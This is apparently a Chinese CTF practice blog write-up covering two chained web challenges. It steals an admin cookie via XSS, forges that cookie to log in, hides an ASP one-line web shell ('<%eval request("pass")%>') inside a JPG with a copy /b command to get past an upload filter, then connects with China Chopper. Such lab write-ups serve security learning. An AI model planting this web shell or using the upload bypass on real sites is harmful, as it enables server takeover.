ctf练习
一.看题目这是一道利用xss偷取管理员cookie的题目。
那么我们就去xss测试一哈子
在这里插入图片描述
发现确实存在xss漏洞
那么我们如何偷去管理员cookie呢?
题目tips:xss bot 每10秒访问一次页面
说明我们可以尝试去盗取了
这里要用到一些XSS平台,让管理员的cookie暴露出来。
使用这条语句
然后后台管理员一点击审核查看我们的留言就会中招,
这里已经盗取了他的cookie。(flag也得到了)
那么我们可以用他的cookie做些什么呢?
接着请看下一题
二.
通过题目我们知道这里的cookie为上一题我们盗取的cookie。
这时我们伪造cookie登录后台
这里利用一个插件,当然F12也可以伪造cookie
然后刷新就可以进入后台了
然后根据题目就是要找一个上传点了;
随意点击网站查找可能存在上传点的地方
这里貌似就可以,我们尝试随便上传张图片试试,
上传成功并且还显示路径及上传后的随机名字
那么我们直接asp上传一句话试试,发现
这里发现有限制
怎么办呢?
我们可以把一句话写入图片中…
cmd命令 copy 1.jpg /b+ 1.asp 11.jpg
大致意思为把1.asp内容放进1.jpg中生成11.jpg
其实也可以直接用记事本将图片打开放进一句话…但我们这样坏处是图片已经被搞坏了,容易被管理员发现…
然后上传
然后利用一句话,<%eval request (“pass”)%> pass可以随意改,是我们的一句话密码
使用菜刀连接.
菜刀尽量放虚拟机,可能有后门
然后双击666…
哦.不对,是直接双击就可以了.
就可以发现目录下有flag.txt了
菜刀的作用有很多,也可以添加之后,右键点击虚拟终端,运行命令。
whoami 发现权限贼小
然后可以尝试提权…(还没搞透彻…就不说了)
上一篇: 蓝鲸安全ctf打卡隐写篇----第一期
下一篇: C++虚继承时的内存布局详解
评论列表